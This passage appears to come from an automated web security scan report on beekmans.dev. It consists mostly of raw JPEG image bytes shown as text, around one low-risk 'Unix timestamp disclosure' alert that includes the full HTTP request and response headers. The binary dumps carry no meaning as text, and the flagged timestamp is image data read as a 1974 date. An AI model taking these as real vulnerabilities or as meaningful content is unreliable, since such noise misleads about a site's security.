          ÇNJù‹¹€%IÇÕ‘‰ã<sA‘‰8ÇLR³-UõÔVbcW8-’3Ž´“­jk1lg·@#1c“Ö©#)NêރÉÌ#Ù½=©"8~܃MÉÛ·¶s@%NGZvОoy18ÿZO¢çô¨)èÇx9憇NVc۟˜ýìa?q»šŽüæšI'&’C”•Çg÷¨_õŸ7'9ïœÑ“œ÷§byµ>øúÐÔÈëš@pr(Ž”	1íòôîiåéÜÓCހÄQaó!q†on”½Fîø4ÐH9ïFãœÑ`RBç•=Í!ûÇëFI9¤ –î<íúRî>ߕ1O#ڗ4¬Zzy`÷â“Ê´úZ¢.3É´y=jAE¹‘ÏZ_ zԔP#û8ÏÞ ÁŽ„cRÑ@\‡È>Çñ¥íÏOnjjZrnØçñ [· >ù©és@\®-›Œîsҟöv*{œÔÀ҃JÃSh¯öWÆ03޹ïGÙÀÎ:ç½YÍ.h°¹ŠÆÍÈ ÇC»­]³ðõõülöñ®Õ8πjΗ§É¨Üm/28ì=½v*AEDUÅDåm
          #vq¿ð†j­ÀHG<8sOÿ„#Xlb(G?óØ+·Föý*ÊØ`V^іp
          àMh®VAÿ®Ã‘UotGH¶ßy„Î#nÇ×ê
          p85‰ÈÉ"+«u…U¡8\òbÝä3Žýk²Ôüå¥Ó¥9ÿ–dåOøW/}£êZk´Ú¶ÑüiÈ­£4ö2qh®ÇïQÈÇh¦‰•†ÓÅ/
          ÆsTI8m‘¨pwÎ*ö”WÏfSÁN;Ös1,v®@«Ú@ýìŸÂUzR–Ã[šÅ¨-L&“ŠÈÐ…BÍJÄÔLM1
          sP1§;TLj‘"Iš”°†5ۂíó®p)¢á·
          Á
          矐t¥vöGC¥µÊÏÒÿ¨ÌÒæ¤+hIIJþí.Û_ùë'ýñKvpþ­/æþ¿Ì‹4O‘#ï‰Ëàäb¡ÍRw1©	AÙÿ˜ìњfjXBäÈü¢rG©ì(nÊá9ÉEcäóøäoaØZ‡4Žìì]ŽKšnhвY©KÝÙh¿¯=ØìѺ›š3LÈvhÍ74f˜A I>o¸Ãk})’)ŽFFê§ó¦R¹ómÖOâåo§cý*ŽçD}ún=V«Ó¯ùýäy£4Üњ³œvhÍ35 Ó¤d@1aö‚:w¨”œvGV„j¦å+%o½ßÍ.YG"ŒÕ‰gº„€åpz ƒô¦}¶oï/ýð)''ª_ü•*0—,¥$ÿ¿ù"њ˜]Ü3R	=AS–€~ù•ßþyªŽ>¦‡).Ÿ×Ü\0ôf¯ÎÒ]\U¿ô¯ÁjSÍ©.ñç’PH¤T9«Nêç5X{9¸vc³IšLњfbæŒÓsE8ET?xçÖ¬ƒU3Mq§&`çíL54Q–#¡ÑÙd°$Ž=ªÄ:3Èd\žx«ÖvLøÈ5³og°
          –ÊW0âð˲ü÷(	îñU®´cjÅYÏ=ë‚m¦ËKŽEܧ¨"¥Hv8¿°
          ¸ó>o\R·ùõÅl_éÏlL‘åâýV³óZ+2ecd6¿Ÿ\R0:¾
          ²M&iŠå±ŸŸ>œP¶¡y-šŸ4™¢ÃRh€ÛŸ›žÔUÇ,IúT٤ͻ!û2ã–?•'ÙG÷ÿJž’€¹·_R)
          ºö$TԔÈ~οÞ?•g_ïʦ¤ D^Bã©£È\u5%ä~B㩤òTw&¤¤ .4D õ4ykïN¢€»KIEKM¢Ž¥¦Š\Ð!ÔRQ@Å¥¤¢KIK@šZm--Y²³’úåaüLz(õ¨mà’êu†%Üìx®ÊÃLŠÊÜFŽ]½MD¥ÊTcrõ½•ºAùGsÜúš¶zƒøU%zùœÔ‹n½7þµÎìl^F„taJ™
          ¿Rj‚[(þ:”@ŸóÒ§B%šïvÀ§«ÛÍ’zb³Å¸Çúŧþz/åK@ÔÔGµ'ïñŽI9²t*Ø ö"³–ÝOÔýL–ê?å¨ÿ¾(Ðz™:ǃtH3ÀD2z\V£à½BĖ„¨;¨5ê+
          €?yÿŽÔ‚è_ÿ«FˆpLðéDöìRU ûе£HMñ¨kÖ¯t
          ?Q\NªO¨Ašäõo	[èàß[ɕn1ëZª‰èCƒFa4ÒÔÖcLf>´;T.Ô¬Õ51
          cQ±¥cQ“T"IŽv¸*<Ó¦?êÿÜiGcZÿÄcÁ šfêBÕF%…ÖÅT|ÁÀúS|™¿ç“þTÐßèí þF¢Þ}OçP¯wcªn±æOnþoȟȘÿË'ü¨™Â
          œ„êGvïPn?Þ?&êvwÔÍԊ‹P[ùÿÀš3LÝFjŒGæŒÓ3Iš“4™¦fÔüԐHL7Üqµ¾•hÍ&®¬T&á%%вmŸþzEÿ}ŠO³¿üô‹þþ
          ­š3JÒîkÏGù_ßÿšHÚ0	d9þëO¼?é-ôÊ«f¦¼?éOø*_i|ÿB¯F\ªÚÇò±Ü4`¡ã=Qºõ©þTó¬Ûø•¾ðúzÕ\Òf›Žºϗ–k™-¯ÓçÛȴפ±OV?y¿Â 'ƒLͦ’DT©*›ÿÀE›³ûóì£ùT9§Ý7úKþÊ¡Í(|(¬Kýôý_æ?4™¦æŒÕŽÍ¦fŒÐ"@jº­J§'ÕfÖÁ¥aÍ"†Õå<V݆‘Жñ«6Z9Çð­h¬cçΡȥm­’%:qïV7(þ4¦‹TÆß5­ÓûíùÖw.ÚEÿž‹Q4£ûëMxP~uB¿ÞoΘ‡³‚0YH=«ÿKS™mˆÏxóü«M£\ÿçL(ž­øš¤ì&®s FíMÍnÞéñÜÈBÈ;úÖ‘¼NQԆªw3jÃsFh¤¦ ¢’Š)(¢€
          J( ’Š(¤ÍPIFhÍ%¢Šm-%´´”PÒÒQ@¢“4´´´ÚZZZJ(iȍ#„E,Ìp¦Œ’äšÞÓ,~Ê¢i2ÿ|ÒnÃJ憓§¥„$±g3z{
          Ó2۟­f†ä{SÃc°®w®æËCL<y'pÀïO¦Þ«Ÿ­fn'²ô§ç?.~•<¥\Õ(ÇL÷æ¤YОÊ>µð€§‡ÁþøRåšâtìê½<L˜åük$;g¨ü©âBØäþí.QÜÙIâƵ2\GŸ½ŸÇXKœç·ûµ*¹þˆ)rŽæâÍçsOC·ïuéŠÃ»ªÿã•"µ?
          Vͱ$š²¼S$Røzr€ðËÎ}èBàõO]vmáH .·"œV¨Oc‹/ÅFÒR;TõÓcìõ51ž£/UbG–¦¦–¦–¦ÞjPñ’Tc!±IæCÿ<›þû¨R©åF¾Ú^_rÿ"Á’ùâß÷ßÿZ“͇þx·ý÷ÿÖªù£4r öÒì¾åþDí2˜ü´M œœ¶j=Õê7SJÄJnnì“u&êfê7S ~ê7Ty£4&ê3Qî£4ýÔn¦n£4ýÔn¦fŒÐ÷Qº™š3@ÍNóÃ#xŸq뵸ª™¥Í'Í!RPM/ÊåößóÊOûïÿ­Fûoùå'ý÷ÿÖªù£4r•íŸe÷/ò,o¶ÿžRßýjMöÿóÊOûïÿ­UóFhålû/¹‘,’™dg#Jni™£4Ò±”¤äÛ{±ù£4Ìњbš3MÍ 	ü߅kX8VMº™%Ú98­Ë->N	$
          —a£ µ•vÅ[I—Ò³a€Æ£÷„þh‹5E¿=;ƒŸ¥DóǞ‡ò¨EÿžQ<ƒ?xÑ`¹3L¾‡ò¨Ì럻úT%ÿÚ4Æ=ë•§ÜoÊ¢3c’:Œ¸þñ D†oö*µÔit›^<ÍÜSËÓK­01n-ä·l0ã±õ¨s[åº•nAíYw6†,¼2~¢´Nä4W¤£4•D‹IERQE”´”RQE%Q@’–ŠÿÙ
          Evidence
          20131229
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        32. GET https://beekmans.dev/img/portfolio/minor/blue/39-thumbnail.jpg
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          130277488, which evaluates to: 1974-02-16 21:11:28

          Request
          Request line and header section (266 bytes)
          GET https://beekmans.dev/img/portfolio/minor/blue/39-thumbnail.jpg HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: https://beekmans.dev/
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1162 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:56:07 GMT
          Content-Type: image/jpeg
          Content-Length: 206479
          Connection: keep-alive
          last-modified: Tue, 02 Nov 2021 10:18:04 GMT
          etag: "3268f-5cfcb9bec2340"
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          Cache-Control: max-age=14400
          CF-Cache-Status: HIT
          Age: 2419
          Accept-Ranges: bytes
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SYXxHO2kzCBxL9qJ96pBwK%2Fu7dVLWBMYkUBmyhg22h%2FJCxoI7u0Yf9ccFyIITYmPwk%2BYbhFBi8dkM8jrfr7jbM2TCDCUS4Fm46vKeCPMJFbFffN2RsHn4GLPwNUiVLI%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a47d1d0f4c43-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (206479 bytes)
          ÿØÿáæExifMM*bj(1!r2“‡i¨Ô
          ü€'
          ü€'Adobe Photoshop 21.0 (Macintosh)2019:12:03 13:35:22  ° v"*(2¬HHÿØÿíAdobe_CMÿîAdobed€ÿۄ			
          
          
          
          ÿÀT "ÿÝ
          ÿÄ?	
          	
          3!1AQa"q2‘¡±B#$RÁb34r‚ÑC%’Sðáñcs5¢²ƒ&D“TdE£t6ÒUâeò³„ÃÓuãóF'”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö7GWgw‡—§·Ç×ç÷5!1AQaq"2‘¡±B#ÁRÑð3$bár‚’CScs4ñ%¢²ƒ&5ÂÒD“T£dEU6teâò³„ÃÓuãóF”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö'7GWgw‡—§·ÇÿÚ?ì’I%iI$’JrúŸ«n}8Âëi¯Ðu¤T털?gº?’šž•‘yp«/$í‚fèç⥛ÿ,Sÿ…_ÿŸÏÕвtÃ"ë‰ò—,tµ 9°sî^GþÄ%û7þåäìBëX^kcŸK[a½€‚{´>¿üÕ0ZI`ZÞ%Ø.áxÿØ9¿÷/#ÿbýƒ›ÿrò?ö!uö0°L×5Ó‰§Ç䏿.ÁTGöoýËÈÿ؄¿`æÿܼýˆ]U
          º–Ü(umx¶´±ãX÷±Íö©úŒýÆÿ¯ÉžDXF4H:£É~ÁÍÿ¹yû—ìßû—‘ÿ±­W݀| ¤û+{«¬>À	c
          Æ=­Ý®ÝÈûòì¡y'ô,Úë6»+#cD’/¨ö]‹f=µåd<›ë¬¶ËšZ÷mxsWaœp^ç1µ8Ña¶½aöïÌzä³~Ž7þ£þ©IŠfbÊ$+GdòRNy?É«T’I$§ÿÐì’I%iI!Úm5F°‰EF”åæÿË4áGÿçÅ·õséäü+ÿы7þZ£ÿ
          ?ÿ>-¿«ŸO'á_þŒK'óGËþét]+…€ã½Ûš,ö€ÂG¨æí­ÞýŸAX-
          lëÒ~à?+”ÏÑUNëïJ¤9ùx¸8wçe¸2ŒjÝe"a­ŒÎwòW5‹ÒúÏÖJۛÖrïé˜Wø½#â—úF6ÙÔ2X=k-µ§ßŽÏM”Æo­\úðÖ¿¢×]ÀK3pٙ<z'"ŸSwò~Š?ւöt÷ÙìnÐ,’-ÎÖÔG溯ç=ßÍïHςC}æ¯ÃÝÉw\DFüܱõB†ÐÜÏ«_+
          çɤ›Ý‘c„ûo£ Ûê}Å«¿W:æOR¯#¨TÜ^¯Ó^)ÏÇÛ.©É ïÕòYï¯ÿ8U>©>ÛZßMþ™ihy2ƺ}cŽÝvîý«ÿ[S›ÆE» 5ݮɎÆFÚ7ÿÂzôÐä2Þ®ü—óx§6çºØ™nélîm‘ê}ý-ŸAŽhåÄ ýõ8Ø9ºx€¤+Q·üЎŒ:‰âFßú’¸Üÿ†èÿª]P…pÿ·ËóJã³þŽ/þ£þ©OËì|֗mßHüS'wÒ?È­RI$’ŸÿÑì“=í­…ï0Öò,‹t˜…Óà[î
          Øci}LÛ{†³ ’´+œõ|ÿ¯úÿ)ktÜÇd×aÜúÀ!ÝËNžïå5>CKì’×Îÿ–èÿÂoÿÏ«sêçÓÉøWÿ£wü»Gþþ}sêçÓÉøWÿ£26—é&.Ó€÷s÷ÿ§:Èø F€m:y»ÿ ›ª=KßÒÛüå§W¸çV׿k]ú/Sm¸ª¼U>Ku>‹Õz~GNËnì|¦ì$ùìß¤c½õÿ-sÔõûº[‰õ²—Î;MUuºêu´_Y®¿Òm¶ádÙ·õŠmýì¯Õõ=%ÓÛ[žA¢ƒk¸
          Ói3ü©nÔAGPz<áúéõyímÝ_1¦hÆÄ¥Ík\á·}™6VÌ|Zýߥ¹f}Të732η–1¾±u,“^]V±Ím~—è±1i¾¦ÐÖ;ôvYoé¿áoéXAÀxÂóß®¿UZδί•i+>Æ3¨>dÒí­¡ŽÜáíÆÈÙU~£¿£?þù¹!íэUïKOÑQâ‘lø¾‰é¿÷ÿ脃,ã~ŸÌcfæt½˜¶d9øºWuÐç4ðÜ\› 9Û¿í6K¿þbïÓú_iÔ¯ªÚàXâÚ÷ˆmÀn
          ${^æîc®«{Ñïå£?Ýro¡ï®ÍÎ¥ýïø›?ê
          ã:‡ÑÅÿÃxÿõK±ÍméÏm¯XÚð6‡83Üýží›¿uqÝGèâÿáÌúµs—ùK^[÷wôÅ2w}#ñLŠÅ$’I)ÿÒì–?_Ê{V00ÂßQÿÊ2ZÉþ¦Õ°‘õ_©2‹ï¶æXþ´w¾=ÌÑVøã–ñ>´ຜ,JñhkY«Þ¬yåÆ?ê>Äcõ¤G¯“¯òÙÿ¤U̼
          °é«ÓsœWï‚`7Ghû‰±•Jˆ/)×óNUǹ¬Šæm'o62¿uë~n)qÇ¥µ—Àw¾f>Ó­ß¼¶:—FÄêO®ËÝeo¨‡VF­'v×5íç*óG§§ÈûëÿÒiÀƨ¨?óó«þë~öÿé¿ççWýÖýíÿÒ(ßóG§§ÈûëÿÒi͝þŸ#ï¯ÿI¡Xÿt}е±~ºu¬¬š±«ô˜ûœ×Úö±€Ÿß£þ¿AhUÕþ´Ú^öx©‚Ë
          Žu[k/¾ƒmŒ¿»+mc¹ïÞÏ ³ßõo«2èȼ]]–׸Tæîc὏©Ì{W+gÖ.³‘éÙ~Kí,pµ¡çsCçÔÝé;ôOÚÿ¡]Œô«ÿè#ö.ˆ'gµ¯ë[¶·ß^Nñ«©¹½{š*{-½¯sY„ë[¶¬w¹õ½›þ‚¥Ô¾²uæ?¦õ*j»Óp¦á2Ͷ†oöºš··Ò·ü+5oÖ~¹uÇ·$¾‹ÚúËZmÍµžÖlÛcö3üøMkôLýa§'¨uí9>¿¦ç3`Üuß¹Ž÷~gµ¯%Þ¨z»:Xo¯ãÑ/ý>€×ŠçûFßQÝ7%ßKs)ý&þsôÎÓúM:)ôim;Ý`d€çêâ&FãùÛygãýZÅÆvê2²Ii#ôdÓ½š:¯Írӓ0t?ø*ÆBñ¼¿­ûÒýÞ&ÿ-ž9	,ºGú¿Õýî—Zë]S†vƒÒtINÇ;eŒüýËõ‡æß‹A¥µ´ÐýÁÅßEãH-oï.žú*È¢Ê.nêíik‡‘ÿ¿5gc}Wéô]MæËžêËmkæAƒì±ÁŒký?Q¿ÛVyLàÀé(ÿ΋[›ÃÁ.1òÈÿ‹'eßHüS$’™¨¤’I%?ÿÓìÚǼ–±¥ç˜h’¶±­
          Ç­®kÚÐ,w Gî¬þ–æ·%ÅÄ4l:;µiœ¬``ÚÀG#pþõ.Cf©l{¯ë3Áßæ;ÿ"©õ-×VÆÔǸ‡I†;ˆ#¸óVþ׋þš¿ó‡÷¥ö¼_ôÕÿœ?½0X7E%Åû6OúÿšRû6OúÿšV×ÚñÓWþpþô¾×‹þš¿ó‡÷©=É~ê8GwìÙ?è_þiU:…ù˜~˜¯§ef$ŸEš4ún#ó§Úº_µâÿ¦¯üáýé}¯ý5çïKܗwx¼Ž£ÔîǺ‘Ðóšm­õ‡Èíu{¾æî\“~«õÐÐ>œ æ^½‡íx¿é«ÿ8z_kÅÿM_ùÃûÒ÷Oî~k­‹ãÿóc®ÿÜŸûeëwêû:·GÄ·Α™y¶ßT9Œ-le{aàþâô?µâÿ¦¯üáýé}¯ý5çïKÝ?¹ù¨›KËàåæåÞi³¥åâ
          ¥ÂË[,$~d€6»÷U㍐D^GõJÚû^/újÿÎޗÚñÓWþpþôŽCû«hwy~£™WK¯~Cíx>†3´ÞáùÖÍÇ®}ÿ¿üÚäÝÔ³Æyê>±v[¹ä{\ßô.¯þãÿÁèÏzØúó‹”þ¤ÌÚ/g°VÝ퇁³vìg£õ7zµþÿé?bŸ(F<Qˆ7ýêùdœèJF\:{N“Ô+êÔ1Ø}Zà_@÷9„ýëÔý¿¢³þþ¯}›'ýÿÍ+Îñs²ú~[30¬ô²+àò×4ý*­gøJŸùìÿўõé]ë>YÄ6nn>MP21Þá,'óÚã·Ô¡ÿàíÿÑ¿£LÉÅ@°³„!û6OúÿšT_]Œ€ö9“Æá·V10.dŸåïYýYíu•mpt5ÜîÔÈ̓DRÑÿÔî1¿œ?Õþ!BïçŸñþçT•ŸÒYÑúD´_<$œ‡è}Ñ|ð’J~‡Ñ-Ï	$§è}Ñ|ð’J~‡Ñ-Ï	$§è}Ñ|ð’J~„¿Ðô,ûNß³í>¶ÿ£·ù_ëýEÃdú>«þÏ¿ÐÜ}/SéíüÝð¼Ñ%&>©‹èRéß´hÓû.~Û'ÓýÝ¿á}yöý›oóûÿó禼õ$e³#ôES¾½ÛwKwm³ùÛ7{¶nú‘²þ“>ò¯œRPu}ÿÙÿí.Photoshop 3.08BIMïZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%G+R8BIM%jäÞ캐Lµj`,ë–E¯8BIM:åprintOutputPstSboolInteenumInteClrmprintSixteenBitboolprinterNameTEXTprintProofSetupObjcProof Setup
          proofSetupBltnenumbuiltinProof	proofCMYK8BIM;-printOutputOptionsCptnboolClbrboolRgsMboolCrnCboolCntCboolLblsboolNgtvboolEmlDboolIntrboolBckgObjcRGBCRd  doub@oàGrn doub@oàBl  doub@oàBrdTUntF#RltBld UntF#RltRsltUntF#Pxl@R
          vectorDataboolPgPsenumPgPsPgPCLeftUntF#RltTop UntF#RltScl UntF#Prc@YcropWhenPrintingboolcropRectBottomlongcropRectLeftlong
          cropRectRightlongcropRectToplong8BIMíHH8BIM&?€8BIMò
          ÿÿÿÿÿÿ8BIM
          8BIM8BIMó	8BIM'
          8BIMõH/fflff/ff¡™š2Z5-8BIMøpÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿèÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿèÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿèÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿè8BIM8BIM
          8BIM08BIM-)í8BIM@@8BIM8BIM}v°$19-top_5_vulnerability_scanners copy°vnullboundsObjcRct1Top longLeftlongBtomlongvRghtlong°slicesVlLsObjcslicesliceIDlonggroupIDlongoriginenumESliceOrigin
          autoGeneratedTypeenum
          ESliceTypeImg boundsObjcRct1Top longLeftlongBtomlongvRghtlong°urlTEXTnullTEXTMsgeTEXTaltTagTEXTcellTextIsHTMLboolcellTextTEXT	horzAlignenumESliceHorzAligndefault	vertAlignenumESliceVertAligndefaultbgColorTypeenumESliceBGColorTypeNone	topOutsetlong
          leftOutsetlongbottomOutsetlongrightOutsetlong8BIM(?ð8BIM)î8BIMÈ Tà€¬ÿØÿíAdobe_CMÿîAdobed€ÿۄ			
          
          
          
          ÿÀT "ÿÝ
          ÿÄ?	
          	
          3!1AQa"q2‘¡±B#$RÁb34r‚ÑC%’Sðáñcs5¢²ƒ&D“TdE£t6ÒUâeò³„ÃÓuãóF'”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö7GWgw‡—§·Ç×ç÷5!1AQaq"2‘¡±B#ÁRÑð3$bár‚’CScs4ñ%¢²ƒ&5ÂÒD“T£dEU6teâò³„ÃÓuãóF”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö'7GWgw‡—§·ÇÿÚ?ì’I%iI$’JrúŸ«n}8Âëi¯Ðu¤T털?gº?’šž•‘yp«/$í‚fèç⥛ÿ,Sÿ…_ÿŸÏÕвtÃ"ë‰ò—,tµ 9°sî^GþÄ%û7þåäìBëX^kcŸK[a½€‚{´>¿üÕ0ZI`ZÞ%Ø.áxÿØ9¿÷/#ÿbýƒ›ÿrò?ö!uö0°L×5Ó‰§Ç䏿.ÁTGöoýËÈÿ؄¿`æÿܼýˆ]U
          º–Ü(umx¶´±ãX÷±Íö©úŒýÆÿ¯ÉžDXF4H:£É~ÁÍÿ¹yû—ìßû—‘ÿ±­W݀| ¤û+{«¬>À	c
          Æ=­Ý®ÝÈûòì¡y'ô,Úë6»+#cD’/¨ö]‹f=µåd<›ë¬¶ËšZ÷mxsWaœp^ç1µ8Ña¶½aöïÌzä³~Ž7þ£þ©IŠfbÊ$+GdòRNy?É«T’I$§ÿÐì’I%iI!Úm5F°‰EF”åæÿË4áGÿçÅ·õséäü+ÿы7þZ£ÿ
          ?ÿ>-¿«ŸO'á_þŒK'óGËþét]+…€ã½Ûš,ö€ÂG¨æí­ÞýŸAX-
          lëÒ~à?+”ÏÑUNëïJ¤9ùx¸8wçe¸2ŒjÝe"a­ŒÎwòW5‹ÒúÏÖJۛÖrïé˜Wø½#â—úF6ÙÔ2X=k-µ§ßŽÏM”Æo­\úðÖ¿¢×]ÀK3pٙ<z'"ŸSwò~Š?ւöt÷ÙìnÐ,’-ÎÖÔG溯ç=ßÍïHςC}æ¯ÃÝÉw\DFüܱõB†ÐÜÏ«_+
          çɤ›Ý‘c„ûo£ Ûê}Å«¿W:æOR¯#¨TÜ^¯Ó^)ÏÇÛ.©É ïÕòYï¯ÿ8U>©>ÛZßMþ™ihy2ƺ}cŽÝvîý«ÿ[S›ÆE» 5ݮɎÆFÚ7ÿÂzôÐä2Þ®ü—óx§6çºØ™nélîm‘ê}ý-ŸAŽhåÄ ýõ8Ø9ºx€¤+Q·üЎŒ:‰âFßú’¸Üÿ†èÿª]P…pÿ·ËóJã³þŽ/þ£þ©OËì|֗mßHüS'wÒ?È­RI$’ŸÿÑì“=í­…ï0Öò,‹t˜…Óà[î
          Øci}LÛ{†³ ’´+œõ|ÿ¯úÿ)ktÜÇd×aÜúÀ!ÝËNžïå5>CKì’×Îÿ–èÿÂoÿÏ«sêçÓÉøWÿ£wü»Gþþ}sêçÓÉøWÿ£26—é&.Ó€÷s÷ÿ§:Èø F€m:y»ÿ ›ª=KßÒÛüå§W¸çV׿k]ú/Sm¸ª¼U>Ku>‹Õz~GNËnì|¦ì$ùìß¤c½õÿ-sÔõûº[‰õ²—Î;MUuºêu´_Y®¿Òm¶ádÙ·õŠmýì¯Õõ=%ÓÛ[žA¢ƒk¸
          Ói3ü©nÔAGPz<áúéõyímÝ_1¦hÆÄ¥Ík\á·}™6VÌ|Zýߥ¹f}Të732η–1¾±u,“^]V±Ím~—è±1i¾¦ÐÖ;ôvYoé¿áoéXAÀxÂóß®¿UZδί•i+>Æ3¨>dÒí­¡ŽÜáíÆÈÙU~£¿£?þù¹!íэUïKOÑQâ‘lø¾‰é¿÷ÿ脃,ã~ŸÌcfæt½˜¶d9øºWuÐç4ðÜ\› 9Û¿í6K¿þbïÓú_iÔ¯ªÚàXâÚ÷ˆmÀn
          ${^æîc®«{Ñïå£?Ýro¡ï®ÍÎ¥ýïø›?ê
          ã:‡ÑÅÿÃxÿõK±ÍméÏm¯XÚð6‡83Üýží›¿uqÝGèâÿáÌúµs—ùK^[÷wôÅ2w}#ñLŠÅ$’I)ÿÒì–?_Ê{V00ÂßQÿÊ2ZÉþ¦Õ°‘õ_©2‹ï¶æXþ´w¾=ÌÑVøã–ñ>´ຜ,JñhkY«Þ¬yåÆ?ê>Äcõ¤G¯“¯òÙÿ¤U̼
          °é«ÓsœWï‚`7Ghû‰±•Jˆ/)×óNUǹ¬Šæm'o62¿uë~n)qÇ¥µ—Àw¾f>Ó­ß¼¶:—FÄêO®ËÝeo¨‡VF­'v×5íç*óG§§ÈûëÿÒiÀƨ¨?óó«þë~öÿé¿ççWýÖýíÿÒ(ßóG§§ÈûëÿÒi͝þŸ#ï¯ÿI¡Xÿt}е±~ºu¬¬š±«ô˜ûœ×Úö±€Ÿß£þ¿AhUÕþ´Ú^öx©‚Ë
          Žu[k/¾ƒmŒ¿»+mc¹ïÞÏ ³ßõo«2èȼ]]–׸Tæîc὏©Ì{W+gÖ.³‘éÙ~Kí,pµ¡çsCçÔÝé;ôOÚÿ¡]Œô«ÿè#ö.ˆ'gµ¯ë[¶·ß^Nñ«©¹½{š*{-½¯sY„ë[¶¬w¹õ½›þ‚¥Ô¾²uæ?¦õ*j»Óp¦á2Ͷ†oöºš··Ò·ü+5oÖ~¹uÇ·$¾‹ÚúËZmÍµžÖlÛcö3üøMkôLýa§'¨uí9>¿¦ç3`Üuß¹Ž÷~gµ¯%Þ¨z»:Xo¯ãÑ/ý>€×ŠçûFßQÝ7%ßKs)ý&þsôÎÓúM:)ôim;Ý`d€çêâ&FãùÛygãýZÅÆvê2²Ii#ôdÓ½š:¯Írӓ0t?ø*ÆBñ¼¿­ûÒýÞ&ÿ-ž9	,ºGú¿Õýî—Zë]S†vƒÒtINÇ;eŒüýËõ‡æß‹A¥µ´ÐýÁÅßEãH-oï.žú*È¢Ê.nêíik‡‘ÿ¿5gc}Wéô]MæËžêËmkæAƒì±ÁŒký?Q¿ÛVyLàÀé(ÿ΋[›ÃÁ.1òÈÿ‹'eßHüS$’™¨¤’I%?ÿÓìÚǼ–±¥ç˜h’¶±­
          Ç­®kÚÐ,w Gî¬þ–æ·%ÅÄ4l:;µiœ¬``ÚÀG#pþõ.Cf©l{¯ë3Áßæ;ÿ"©õ-×VÆÔǸ‡I†;ˆ#¸óVþ׋þš¿ó‡÷¥ö¼_ôÕÿœ?½0X7E%Åû6OúÿšRû6OúÿšV×ÚñÓWþpþô¾×‹þš¿ó‡÷©=É~ê8GwìÙ?è_þiU:…ù˜~˜¯§ef$ŸEš4ún#ó§Úº_µâÿ¦¯üáýé}¯ý5çïKܗwx¼Ž£ÔîǺ‘Ðóšm­õ‡Èíu{¾æî\“~«õÐÐ>œ æ^½‡íx¿é«ÿ8z_kÅÿM_ùÃûÒ÷Oî~k­‹ãÿóc®ÿÜŸûeëwêû:·GÄ·Α™y¶ßT9Œ-le{aàþâô?µâÿ¦¯üáýé}¯ý5çïKÝ?¹ù¨›KËàåæåÞi³¥åâ
          ¥ÂË[,$~d€6»÷U㍐D^GõJÚû^/újÿÎޗÚñÓWþpþôŽCû«hwy~£™WK¯~Cíx>†3´ÞáùÖÍÇ®}ÿ¿üÚäÝÔ³Æyê>±v[¹ä{\ßô.¯þãÿÁèÏzØúó‹”þ¤ÌÚ/g°VÝ퇁³vìg£õ7zµþÿé?bŸ(F<Qˆ7ýêùdœèJF\:{N“Ô+êÔ1Ø}Zà_@÷9„ýëÔý¿¢³þþ¯}›'ýÿÍ+Îñs²ú~[30¬ô²+àò×4ý*­gøJŸùìÿўõé]ë>YÄ6nn>MP21Þá,'óÚã·Ô¡ÿàíÿÑ¿£LÉÅ@°³„!û6OúÿšT_]Œ€ö9“Æá·V10.dŸåïYýYíu•mpt5ÜîÔÈ̓DRÑÿÔî1¿œ?Õþ!BïçŸñþçT•ŸÒYÑúD´_<$œ‡è}Ñ|ð’J~‡Ñ-Ï	$§è}Ñ|ð’J~‡Ñ-Ï	$§è}Ñ|ð’J~„¿Ðô,ûNß³í>¶ÿ£·ù_ëýEÃdú>«þÏ¿ÐÜ}/SéíüÝð¼Ñ%&>©‹èRéß´hÓû.~Û'ÓýÝ¿á}yöý›oóûÿó禼õ$e³#ôES¾½ÛwKwm³ùÛ7{¶nú‘²þ“>ò¯œRPu}ÿÙ8BIM!WAdobe PhotoshopAdobe Photoshop 20208BIMÿá+Yhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" 